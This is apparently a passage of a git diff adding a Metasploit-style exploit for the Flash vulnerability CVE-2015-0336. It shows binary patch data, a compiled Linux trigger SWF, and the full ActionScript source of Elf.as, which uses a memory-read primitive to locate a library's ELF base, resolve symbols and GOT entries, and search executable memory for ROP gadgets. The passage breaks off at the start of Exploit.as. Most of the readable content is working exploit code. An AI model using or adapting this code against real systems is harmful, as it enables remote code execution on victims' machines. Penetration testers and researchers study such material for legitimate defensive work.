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
E0BQ~<NdN!<

diff --git a/data/exploits/CVE-2015-0336/trigger_linux.swf b/data/exploits/CVE-2015-0336/trigger_linux.swf
new file mode 100755
index 0000000000000000000000000000000000000000..a5dbcdba5b224d9334abdf3b61fb9eaa12db03c4
GIT binary patch
literal 340
zcmV-a0jvH)S5pS#0RRAa+H_DoPs1=2yf|*1G8DB!GDC$}yD+h$eo06SX+p|wrBx_}
z&_qoH^cS>KH!Lyme;D~I{DSiAbVGPJ`JUh1d%ib_Z$Re2nS&AA(`nQ}Cv*sU%@abp
zg-V6->?xin#f2X)me@CMO+&c#(SWU}d74e*6!|JEvvQp$csAw1WEq!>mjuD|F`1Q6
z$~Gv4IM35Hy-$)dTxI!n8qW)81`nNf`;+0v5~pKJJI^e|x&#{<9B2*>kBx~qvLf!T
zWp=G~!HU=WD9cKGK(`=pp1zAqG7ya92S*-})RkJ$yQ$Xt#JSXUaM!DI9_UkWF3cyz
zmw~?qnhYYTk5F|P7#fvp+l2Rzicmx{(8ra8aYwkO!Ml>^xkI{cJM<s_ZZH`se{eHK
m`LHOekZq(k5R-yD1SBdakJ%Bl6Z%Ad0RRC1{{sMqL{l6G;hq@)

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-0336/Elf.as b/external/source/exploits/CVE-2015-0336/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/Exploit.as b/external/source/exploits/CVE-2015-0336/Exploit.as
new file mode 100644
index 0000000000..15abbc3256
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/Exploit.as
@@ -0,0 +1,120 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
